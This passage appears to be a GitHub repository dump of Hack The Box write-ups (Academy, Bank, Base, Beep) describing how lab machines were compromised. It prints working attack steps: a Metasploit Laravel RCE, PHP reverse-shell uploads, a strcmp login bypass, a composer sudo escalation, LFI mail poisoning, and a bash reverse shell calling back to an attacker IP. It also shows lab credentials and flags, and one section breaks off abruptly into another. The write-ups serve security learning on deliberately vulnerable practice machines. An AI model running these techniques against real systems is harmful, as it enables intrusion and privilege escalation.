85 |
86 | ```
87 |
88 | It's a hidden field in the form. I immediately thought about increasing that roleid to 1 and to try my account for the admin login, as I might be lucky and can control the role of my user with it. And indeed! That works.
89 |
90 | 
91 |
92 | On the TODO list it states two strings "cry0l1t3 / mrb3n", which seem to be either passwords or usernames and the task "Fix issue with dev-staging-01.academy.htb". Probably a subdomain of the box. Let's add it to the `/etc/hosts` file and inspect the website.
93 |
94 | ## Gaining an Initial Foothold
95 |
96 | 
97 |
98 | It seems to be some kind of logging service. Scrolling through the logs, we can see some SQL credentials (`homestead:secret`). Let's note them down. Maybe we will need them later.
99 |
100 | Scrolling further down, we can see the application name. Apparently it's a Laravel application.
101 |
102 | Hm, never heard of it. Let's do some research on it
103 |
104 | *Laravel is a web application framework with expressive, elegant syntax. Laravel attempts to take the pain out of development by easing common tasks used in the majority of web projects, such as authentication, routing, sessions, and caching.* (https://laravel.com/docs/4.2/introduction)
105 |
106 | A quick google search on Laravel vulnerabilities/exploits reveal a metasploit module `PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)`
107 |
108 | *This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29. Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php. Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY. Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix. In some cases the APP_KEY is leaked which allows for discovery and exploitation.*
109 |
110 | So, for the exploit we only need the APP_KEY. We have seen this one before! It's contained in the log output!
111 |
112 | Fire up msfconsole, use the module and configure it like this:
113 |
114 | 
115 |
116 | Now start the exploit and we get a reverse shell!
117 |
118 | ```
119 | msf6 exploit(unix/http/laravel_token_unserialize_exec) > run
120 |
121 | [*] Started reverse TCP handler on 10.10.14.26:4444
122 | [*] Command shell session 3 opened (10.10.14.26:4444 -> 10.129.83.160:38564) at 2021-01-22 17:00:18 +0100
123 | [*] Command shell session 4 opened (10.10.14.26:4444 -> 10.129.83.160:38566) at 2021-01-22 17:00:18 +0100
124 |
125 | hostname && id
126 | academy
127 | uid=33(www-data) gid=33(www-data) groups=33(www-data)
128 | ```
129 |
130 | The first thing that we can now check is the `.env` file of the Laravel application. It's located in `/var/www/html/academy`.
131 |
132 | ```
133 | DB_CONNECTION=mysql
134 | DB_HOST=127.0.0.1
135 | DB_PORT=3306
136 | DB_DATABASE=academy
137 | DB_USERNAME=dev
138 | DB_PASSWORD=mySup3rP4s5w0rd!!
139 | ```
140 |
141 | Here we see a password. However, we cannot connect to the database with it. So I went to the home directory and tried to login with every user using this password. This was successful with the user `cry0l1t3`. His/Her home directory also contains the user.txt file!
142 |
143 | ## Privilege Escalation
144 |
145 | ### User cry0l1t3
146 |
147 | linpeas tells us that there the audit log files that are only readable by us (adm group) and root. So this is usually a strong hint. So let's check them out.
148 |
149 | *The Linux Audit framework is a kernel feature (paired with userspace tools) that can log system calls. For example, opening a file, killing a process or creating a network connection. These audit logs can be used to monitor systems for suspicious activity*
150 |
151 | So let's see if someone used `su` or `sudo` or some other commands that then require a password input from the user.
152 |
153 | ```
154 | cry0l1t3@academy:/var/log/audit$ cat * | grep -E -i 'comm="sudo"|comm="su"'
155 | type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
156 | ```
157 |
158 | The data looks like hex. Converting it results in `mrb3n_Ac@d3my!`. That's probably the password of the user `mrb3n`.
159 |
160 | ### User mrb3n
161 |
162 | ```
163 | mrb3n@academy:~$ hostname && id
164 | academy
165 | uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)
166 | ```
167 |
168 | Again we run linpeas. Nothing found.
169 | So we check the sudoers list. This time we are able to run `composer` as sudo!
170 | A quick look onto [GTFObins](https://gtfobins.github.io/gtfobins/composer/), reveals that it can be exploited to gain root access.
171 | So let's follow it step by step:
172 |
173 | First: (creates a random directory in /tmp)
174 | ```
175 | TF=$(mktemp -d)
176 | ```
177 | Then: (creates a json file containing a scripts object)
178 | ```
179 | echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
180 | ```
181 | And finally: (run composer as root to executing the script)
182 | ```
183 | sudo composer --working-dir=$TF run-script x
184 | ```
185 |
186 | And we are root!
187 | ```
188 | root@academy:/tmp/tmp.BCWVFCDOXp# hostname && id
189 | academy
190 | uid=0(root) gid=0(root) groups=0(root)
191 | ```
192 |
193 |
194 |
195 |
196 |
--------------------------------------------------------------------------------
/Academy/pics/admin_logged_in.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/admin_logged_in.png
--------------------------------------------------------------------------------
/Academy/pics/admin_php.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/admin_php.png
--------------------------------------------------------------------------------
/Academy/pics/config_php.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/config_php.png
--------------------------------------------------------------------------------
/Academy/pics/dev_staging.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/dev_staging.png
--------------------------------------------------------------------------------
/Academy/pics/htb_academy.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/htb_academy.png
--------------------------------------------------------------------------------
/Academy/pics/icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/icon.png
--------------------------------------------------------------------------------
/Academy/pics/metasploit_module.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/metasploit_module.png
--------------------------------------------------------------------------------
/Academy/pics/register_php.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Academy/pics/register_php.png
--------------------------------------------------------------------------------
/Bank/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # Bank (Linux)
4 |
5 | ## Enumeration
6 |
7 | ```
8 | rustscan --ulimit 5000 10.129.29.200 -- -sC -sV -o port_scan
9 |
10 |
11 | PORT STATE SERVICE REASON VERSION
12 | 22/tcp open ssh syn-ack OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
13 | 53/tcp open domain syn-ack ISC BIND 9.9.5-3ubuntu0.14 (Ubuntu Linux)
14 | | dns-nsid:
15 | |_ bind.version: 9.9.5-3ubuntu0.14-Ubuntu
16 | 80/tcp open http syn-ack Apache httpd 2.4.7 ((Ubuntu))
17 | | http-methods:
18 | |_ Supported Methods: OPTIONS GET HEAD POST
19 | |_http-server-header: Apache/2.4.7 (Ubuntu)
20 | |_http-title: Apache2 Ubuntu Default Page: It works
21 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
22 | ```
23 |
24 | ### Examine Port 80 - Apache2 Server
25 |
26 | 
27 |
28 | When looking at the website, we can only see the Apache2 Default Page. This happens, if you don't modify the `index.html` file in the root directory of apache. It probably means, that we first have to find the correct directory on the webserver. We can do that by using a tool such as gobuster:
29 |
30 | ```
31 | gobuster dir -w /usr/share/wordlists/dirb/big.txt -u 10.129.29.200
32 |
33 | /.htaccess (Status: 403)
34 | /.htaccess.asp (Status: 403)
35 | /.htpasswd (Status: 403)
36 | /.htpasswd.asp (Status: 403)
37 | /server-status (Status: 403)
38 | ```
39 |
40 | So no luck with gobuster.... Seems like a dead end. At this point I was super stuck. Been researching things for many hours but without any result for this machine.
41 |
42 | ### Examine Port 52 - DNS Server
43 |
44 | As we got no hint how to proceed on Port 80, let's take a look at the DNS server. We can try a few things with nslookup:
45 |
46 | ```
47 | > SERVER 10.129.29.200
48 | Default server: 10.129.29.200
49 | Address: 10.129.29.200#53
50 | ```
51 |
52 | ```
53 | > 10.129.29.200
54 | ** server can't find 200.29.129.10.in-addr.arpa: NXDOMAIN
55 | ```
56 |
57 | ```
58 | > bank.htb
59 | Server: 10.129.29.200
60 | Address: 10.129.29.200#53
61 |
62 | Name: bank.htb
63 | Address: 10.129.29.200
64 | ```
65 | But this does not give us any additional info, besides the DNS name of the IP, namely `bank.htb`. (this was pretty guessy, but as a HTB player, you should know the naming conventions). Maybe it's some kind of HTTP VirtualHost Routing.
66 |
67 | ### Back to Port 80 - DNS name
68 |
69 | First let's add the DNS server to our `/etc/resolv.conf` file.
70 |
71 | ```
72 | nameserver 10.129.29.200
73 | ```
74 |
75 | Now we should be able to access `bank.htb` via the browser. Alternatively, you could also add the IP with the specific name into the `/etc/hosts` file.
76 |
77 | Accessing `http://bank.htb` shows us following:
78 |
79 | 
80 |
81 | We could immediately start bruteforcing the username/password or use SQLMap on it, but let's first enumerate the new website.
82 |
83 | Again we use gobuster for that:
84 |
85 | ```
86 | gobuster dir -u "http://bank.htb" -w /usr/share/wordlists/dirb/big.txt -x php
87 |
88 | /.htaccess (Status: 403)
89 | /.htaccess.php (Status: 403)
90 | /.htpasswd (Status: 403)
91 | /.htpasswd.php (Status: 403)
92 | /assets (Status: 301)
93 | /inc (Status: 301)
94 | /index.php (Status: 302)
95 | /login.php (Status: 200)
96 | /logout.php (Status: 302)
97 | /server-status (Status: 403)
98 | /support.php (Status: 302)
99 | /uploads (Status: 301)
100 | ```
101 |
102 | This time, we find several php files (login.php which we already know, logout.php, index.php and support.php), as well as a directory called uploads. This seems suspicious. Let's check out the php files, to see if we can use one to upload something.
103 |
104 | ## Exploitation
105 |
106 | The problem is, that both, support.php and index.php, forward to login.php. However, there is a nice trick to circumvent this by using burpsuite!
107 |
108 | If we send a request to index.php and intercept it with Burp we get this:
109 |
110 | 
111 |
112 | As response from the server we get following:
113 |
114 | ```
115 | HTTP/1.1 302 Found
116 | Date: Sun, 17 Jan 2021 14:32:57 GMT
117 | Server: Apache/2.4.7 (Ubuntu)
118 | X-Powered-By: PHP/5.5.9-1ubuntu4.21
119 | Expires: Thu, 19 Nov 1981 08:52:00 GMT
120 | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
121 | Pragma: no-cache
122 | location: login.php
123 | Content-Length: 7322
124 | Connection: close
125 | Content-Type: text/html
126 | ```
127 |
128 | When we exchange the `302 Found` with `200 OK`, then we can trick our browser to not redirect to the location header `login.php`. As a result we get to see the index.php file:
129 |
130 | 
131 |
132 | We can do the same for support.php:
133 |
134 | 
135 |
136 | Here we can see the upload functionality that we were looking for!
137 | Let's try to upload a php reverse shell.
138 |
139 | 
140 |
141 | Unfortunately, it tells us that we can only upload images. But there is a nice way to bypass upload filters, if they are not implemented properly.
142 |
143 | After trying some techniques and still not having any success, I took a closer look at the server respone.
144 |
145 | 
146 |
147 | The source code contains an HTML comment, stating that php files should be named `.htb`, if you wanna upload them for debug purposes. So I renamed my .php file and uploaded it again. This time it worked!
148 |
149 | 
150 |
151 | Now when clicking on the Attachment link (or accessing the file in the uploads directory), we get a reverse shell as user `www-data`:
152 |
153 | 
154 |
155 | Now that we have access to the server, we can obtain the user flag.
156 |
157 | ```
158 | $ cat user.txt
159 | 872a3bf9df963d168aeb9985f6910e43
160 | ```
161 |
162 | Afterwards, we have to search for valuable files that help us at escalating privileges. In the directory `/var/www/bank`, I found a file called `bankreports.txt`, that we have not yet seen.
163 |
164 | ```
165 | +=================+
166 | | HTB Bank Report |
167 | +=================+
168 |
169 | ===Users===
170 | Full Name: Christos Christopoulos
171 | Email: chris@bank.htb
172 | Password: !##HTBB4nkP4ssw0rd!##
173 | CreditCards: 2
174 | Transactions: 8
175 | Balance: 1.337$
176 | ```
177 |
178 | Maybe this is the password for the user chris on the machine. Let's try it.
179 |
180 | Unfortunately, it's not working. But we can try it on the login.php website. Maybe we can gain more information there.
181 |
182 | 
183 |
184 | We now have access to Chris' bank account. The problem is that this won't bring us any further.
185 |
186 | So back to enumeration on the webserver... After searching for a while, I found a file called 'user.php' in the directory `/var/www/bank/inc`.
187 | It contains the mysql login details of root:
188 |
189 | ```
190 | $mysql = new mysqli("localhost", "root", "!@#S3cur3P4ssw0rd!@#",
191 | ```
192 |
193 | Maybe, root has used the same password for the server. Let's try to login as root. But ... Does not work as well. Seems like a dead end.
194 |
195 | Next step was to check for files with the SUID bit set.
196 |
197 | ```
198 | $ find / -perm -u=s -type f 2>/dev/null
199 | /var/htb/bin/emergency
200 | /usr/lib/eject/dmcrypt-get-device
201 | /usr/lib/openssh/ssh-keysign
202 | /usr/lib/dbus-1.0/dbus-daemon-launch-helper
203 | /usr/lib/policykit-1/polkit-agent-helper-1
204 | /usr/bin/at
205 | /usr/bin/chsh
206 | /usr/bin/passwd
207 | ```
208 |
209 | The binary `var/htb/bin/emergency` seemed to be suspicious. It belonged to root and had the SUID bit set. So I executed it and obtained root privileges (still not sure what the purpose of this binary should have been :D). Now we can also get the root flag!
210 |
211 |
212 | Alternatively, we could have also changed the password of root, by manipulating the `/etc/passwd` file, to which we have write permissions.
213 |
214 | ## Post-Exploitation
215 |
216 | Root flag
217 | ```
218 | # cat root.txt
219 | 833ebe63c00b129b3373c3824f133792
220 | ```
--------------------------------------------------------------------------------
/Bank/pics/apache_default.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/apache_default.png
--------------------------------------------------------------------------------
/Bank/pics/bank_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/bank_login.png
--------------------------------------------------------------------------------
/Bank/pics/chris_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/chris_login.png
--------------------------------------------------------------------------------
/Bank/pics/error.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/error.png
--------------------------------------------------------------------------------
/Bank/pics/hint.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/hint.png
--------------------------------------------------------------------------------
/Bank/pics/index_php.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/index_php.png
--------------------------------------------------------------------------------
/Bank/pics/index_php_req.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/index_php_req.png
--------------------------------------------------------------------------------
/Bank/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/logo.png
--------------------------------------------------------------------------------
/Bank/pics/reverse-shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/reverse-shell.png
--------------------------------------------------------------------------------
/Bank/pics/support_php.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/support_php.png
--------------------------------------------------------------------------------
/Bank/pics/upload.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Bank/pics/upload.png
--------------------------------------------------------------------------------
/Base/README.md:
--------------------------------------------------------------------------------
1 | # Starting Point - Base
2 |
3 | ## Enumeration
4 |
5 | ```
6 | $ rustscan 10.10.10.48 -- -sC -sV -o port_scans
7 |
8 | PORT STATE SERVICE REASON VERSION
9 | 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10 | | ssh-hostkey:
11 | | 2048 f6:5c:9b:38:ec:a7:5c:79:1c:1f:18:1c:52:46:f7:0b (RSA)
12 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDQmgId8Z5lyLG718jzJ9KoLYQPuaKh/Z1++me8L01noJeFuv5RPeqgtoJSeWKcimm7Cw7q3HDUZEHL2LncJIad5v04ma8xgiAG+xUmiO+ntkOff06rtsEx51XRWrbuN4gcTxDCPQQyTJKnTAfleagTbtoWtPNvi82SzaaPyU88nhcn/72USczCeiVfRvawQCcAIHKqUnJzTGlSHAwd6Fj+4sq4CTw0MCrZSTG9JCQmyUVbCFJaF/AtQ0PDOQ/fVhZH8E7E+faAlJKWTYr2sIfQZmC7enT2W82zzWL/JRiQXgAzsI8B6JTJOl3gbmy3+rLY9H+1qztceYKaA8wjFT/5
13 | | 256 65:0c:f7:db:42:03:46:07:f2:12:89:fe:11:20:2c:53 (ECDSA)
14 | | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA3Z4xQdzt1Zxsy5gdOFTrv3k9HtD0UppMhGWFIFWnHZgWAdONjTRzD/ZeiyGeDUgYWGGpQOzl74HXesdUhr+h0=
15 | | 256 b8:65:cd:3f:34:d8:02:6a:e3:18:23:3e:77:dd:87:40 (ED25519)
16 | |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINbQMzI8ONrv2TFdy0S8PtObPfizkmQ+217qx1pejwce
17 | 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
18 | | http-methods:
19 | |_ Supported Methods: POST OPTIONS HEAD GET
20 | |_http-server-header: Apache/2.4.29 (Ubuntu)
21 | |_http-title: Site doesn't have a title (text/html).
22 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
23 | ```
24 |
25 | We see that two ports are open. Port 80, on which an Apache server is running and ssh on Port 22.
26 |
27 | # Examine Port 80 - Apache Server
28 |
29 | 
30 |
31 | We see a website, with no specific theme or company relation. It's just offering 5 different navigation options, of which only the Login actually works. Clicking on it, we get forwarded to a PHP Login page.
32 |
33 | 
34 |
35 | Instead of trying to bruteforce the login directly, we can start enumerating a bit. What I directly noticed, is, that the URL of the Login is `http://10.10.10.48/login/login.php`. Maybe we can access the parent directory.
36 |
37 | Due to an misconfiguration, we can actually access it!
38 |
39 | 
40 |
41 | And due to another developer mistake, there is still the `swp` file of login.php! This usually happens if the developer edits the file within the directory and then uploads the files to a repository/server without closing the editor first. Let's see if there is any valuable information in that login.php.swp file. Therefore we first download it to our local machine with wget.
42 |
43 | ```
44 | └──╼ $ file login.php.swp
45 | login.php.swp: Vim swap file, version 8.0
46 | ```
47 |
48 | Exactly as I thought. The developer used VIM and forgot to close the editor before uploading it. Using `cat`/`more` or `strings` on the file, it reveals the code of the login.php file:
49 |
50 | ```php
51 | if (!empty($_POST['username']) && !empty($_POST['password'])) {
52 | require('config.php');
53 | if (strcmp($username, $_POST['username']) == 0) {
54 | if (strcmp($password, $_POST['password']) == 0) {
55 | $_SESSION['user_id'] = 1;
56 | header("Location: ../upload.php");
57 | } else {
58 | print("");
59 | }
60 | } else {
61 | print("");
62 | }
63 | }
64 | ```
65 | The above code checks the username/password combination that the user inputs, against the variables that are stored in config.php to see if they match. The following lines are interesting.
66 |
67 | ```php
68 | if (strcmp($password, $_POST['password']) == 0) {
69 | if (strcmp($username , $_POST['username']) == 0) {
70 | ```
71 |
72 | The developer is using `strcmp` to check the username and password, which is insecure and can easily be bypassed. This is due to the fact that if strcmp is given an empty array to compare against the stored password, it will return null. In PHP the == operator only checks the value of a variable for equality, and the value of NULL is equal to 0. The correct way to write this would be with the === operator which checks both value and type ([strcmp doc](https://www.php.net/manual/en/function.strcmp.php), [triple equal operator](http://www.dimuthu.org/blog/2008/10/31/triple-equal-operator-and-null-in-php/)). Let's open burp and catch the login request.
73 |
74 | ```
75 | POST /login/login.php HTTP/1.1
76 | Host: 10.10.10.48
77 | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
78 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
79 | Accept-Language: en-US,en;q=0.5
80 | Accept-Encoding: gzip, deflate
81 | Content-Type: application/x-www-form-urlencoded
82 | Content-Length: 27
83 | Origin: http://10.10.10.48
84 | DNT: 1
85 | Connection: close
86 | Referer: http://10.10.10.48/login/login.php
87 | Cookie: PHPSESSID=nvtt5pdb6j01rmv842sp9u0n3a
88 | Upgrade-Insecure-Requests: 1
89 | Sec-GPC: 1
90 |
91 | username=test&password=test
92 | ```
93 |
94 | Change the POST data as follows to bypass the login:
95 |
96 | ```
97 | username[]=test&password[]=test
98 | ```
99 |
100 | This converts the variables to arrays and bypasses strcmp. Once logged in, we see there is additional functionality to upload files.
101 |
102 | 
103 |
104 | Now we simply upload a PHP reverse shell. It succeeds! But where is it uploaded to? Let's start gobuster and search for additional directories.
105 |
106 | ```
107 | [+] Threads: 10
108 | [+] Wordlist: /usr/share/wordlists/dirb/big.txt
109 | [+] Status codes: 200,204,301,302,307,401,403
110 | [+] User Agent: gobuster/3.0.1
111 | [+] Timeout: 10s
112 | ===============================================================
113 | 2021/01/06 09:54:39 Starting gobuster
114 | ===============================================================
115 | /.htaccess (Status: 403)
116 | /.htpasswd (Status: 403)
117 | /_uploaded (Status: 301)
118 | /login (Status: 301)
119 | /server-status (Status: 403)
120 | /static (Status: 301)
121 | ```
122 |
123 | There is a directory called `_uploaded`. Let's check this one out.
124 |
125 | 
126 |
127 | Now what's left is to start a nc listener on our local machine and then start our reverse shell by either clicking on the shell.php link or by requesting the file through wget/curl.
128 |
129 | ## Exploitation
130 |
131 | Now that we have a reverse shell, let's see what we can exploit to get access to a user or even root.
132 |
133 | ```
134 | └──╼ $ nc -lvnp 4444
135 | listening on [any] 4444 ...
136 | connect to [10.10.14.15] from (UNKNOWN) [10.10.10.48] 49812
137 | Linux base 4.15.0-88-generic #88-Ubuntu SMP Tue Feb 11 20:11:34 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
138 | 09:26:48 up 24 min, 0 users, load average: 0.00, 0.00, 0.00
139 | USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
140 | uid=33(www-data) gid=33(www-data) groups=33(www-data)
141 | /bin/sh: 0: can't access tty; job control turned off
142 | $ id
143 | uid=33(www-data) gid=33(www-data) groups=33(www-data)
144 | ```
145 |
146 | Inspecting the `config.php`, which we previously found in the login directory, we can now see the admin password and username:
147 |
148 | ```
149 | for help
217 | nmap> !sh
218 | id
219 | uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
220 | ```
221 |
222 | ### Local File Inclusion to Remote Code Execution
223 | When I read some other writeups, I was fascinated by the fact that there exist several ways to pwn the machine. Another way I stumbled upon exploited LFI. As I am a big fan of LFIs I also had to try this one.
224 |
225 |
226 | So again we go back to our LFI vulnerability:
227 | ```
228 | GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
229 | ```
230 |
231 | From the ennumeration part, we know that Port 25 (SMTP) is open. Let's it to send a mail to the user `asterisk`, which we leaked from the /etc/passwd file.
232 |
233 | ```
234 | └──╼ $ telnet 10.129.1.226 25
235 | Trying 10.129.1.226...
236 | Connected to 10.129.1.226.
237 | Escape character is '^]'.
238 | 220 beep.localdomain ESMTP Postfix
239 | EHLO babbadeckl
240 | 250-beep.localdomain
241 | 250-PIPELINING
242 | 250-SIZE 10240000
243 | 250-VRFY
244 | 250-ETRN
245 | 250-ENHANCEDSTATUSCODES
246 | 250-8BITMIME
247 | 250 DSN
248 | VRFY asterisk@localhost <- verify if this user really exists
249 | 252 2.0.0 asterisk@localhost
250 | mail from: babbadeckl@pwn.com
251 | 250 2.1.0 Ok
252 | rcpt to: asterisk@localhost
253 | 250 2.1.5 Ok
254 | data
255 | 354 End data with .
256 | Subject: RCE
257 | <- RCE code
258 |
259 | .
260 | 250 2.0.0 Ok: queued as 86A1ED92FF
261 | quit
262 | 221 2.0.0 Bye
263 | Connection closed by foreign host.
264 | ```
265 |
266 | Afterwards we can check if the email was successfully sent and received:
267 |
268 | ```
269 | GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00
270 | ```
271 |
272 | With the LFI, we can leak the email that we have just sent. This also means, that our PHP code now gets executed!
273 |
274 | ```
275 | From babbadeckl@pwn.com Wed Jan 13 22:48:18 2021
276 | Return-Path:
277 | X-Original-To: asterisk@localhost
278 | Delivered-To: asterisk@localhost.localdomain
279 | Received: from babbadeckl (unknown [10.10.14.50])
280 | by beep.localdomain (Postfix) with ESMTP id 86A1ED92FF
281 | for ; Wed, 13 Jan 2021 22:47:17 +0200 (EET)
282 | Subject: RCE
283 | Message-Id: <20210113204725.86A1ED92FF@beep.localdomain>
284 | Date: Wed, 13 Jan 2021 22:47:17 +0200 (EET)
285 | From: babbadeckl@pwn.com
286 | To: undisclosed-recipients:;
287 | ```
288 |
289 | Now when we append our malicious parameter `babbadeckl`, that we included in the injected PHP code, we have RCE:
290 |
291 | ```
292 | GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../var/mail/asterisk%00&babbadeckl=id
293 |
294 |
295 | Date: Wed, 13 Jan 2021 22:47:17 +0200 (EET)
296 | From: babbadeckl@pwn.com
297 | To: undisclosed-recipients:;
298 |
299 | uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
300 | uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
301 | ```
302 |
303 | Let's spawn a reverse shell!
304 |
305 | ```
306 | module_name=../../../../../../../../var/mail/asterisk%00&babbadeckl=bash+-i+>%26+/dev/tcp/10.10.14.50/4444+0>%261
307 | ```
308 |
309 | And we get a shell! Now simply follow the steps from above to obtain root privileges (sudo nmap).
310 |
311 | ```
312 | └──╼ $ nc -lvnp 4444
313 | listening on [any] 4444 ...
314 | connect to [10.10.14.50] from (UNKNOWN) [10.129.1.226] 47868
315 | bash: no job control in this shell
316 | bash-3.2$ id
317 | uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
318 | ```
319 |
320 |
321 | ## Post Exploitation
322 |
323 | We can now obtain the root flag:
324 |
325 | ```
326 | [root@beep ~]# cat root.txt
327 | 78284bce7c9d0b21378ac5bd69ee89c9
328 | ```
--------------------------------------------------------------------------------
/Beep/pics/admin_panel.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Beep/pics/admin_panel.png
--------------------------------------------------------------------------------
/Beep/pics/config.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Beep/pics/config.png
--------------------------------------------------------------------------------
/Beep/pics/logo.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Beep/pics/logo.png
--------------------------------------------------------------------------------
/Beep/pics/vvtiger.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Beep/pics/vvtiger.png
--------------------------------------------------------------------------------
/Beep/pics/website.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/babbadeckl/HackTheBox-Writeups/f9e796ad6012835551c7105c20017c38d2a96463/Beep/pics/website.png
--------------------------------------------------------------------------------
/Blocky/README.md:
--------------------------------------------------------------------------------
1 | 
2 |
3 | # Blocky (Linux)
4 |
5 | ## Enumeration
6 |
7 | ```
8 | rustscan --ulimit 5000 10.129.1.53 -- -sC -sV -o port_scan
9 |
10 | PORT STATE SERVICE REASON VERSION
11 | 21/tcp open ftp? syn-ack
12 | 22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
13 | | ssh-hostkey:
14 | | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
15 | | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXqVh031OUgTdcXsDwffHKL6T9f1GfJ1/x/b/dywX42sDZ5m1Hz46bKmbnWa0YD3LSRkStJDtyNXptzmEp31Fs2DUndVKui3LCcyKXY6FSVWp9ZDBzlW3aY8qa+y339OS3gp3aq277zYDnnA62U7rIltYp91u5VPBKi3DITVaSgzA8mcpHRr30e3cEGaLCxty58U2/lyCnx3I0Lh5rEbipQ1G7Cr6NMgmGtW6LrlJRQiWA1OK2/tDZbLhwtkjB82pjI/0T2gpA/vlZJH0elbMXW40Et6bOs2oK/V2bVozpoRyoQuts8zcRmCViVs8B3p7T1Qh/Z+7Ki91vgicfy4fl
16 | | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
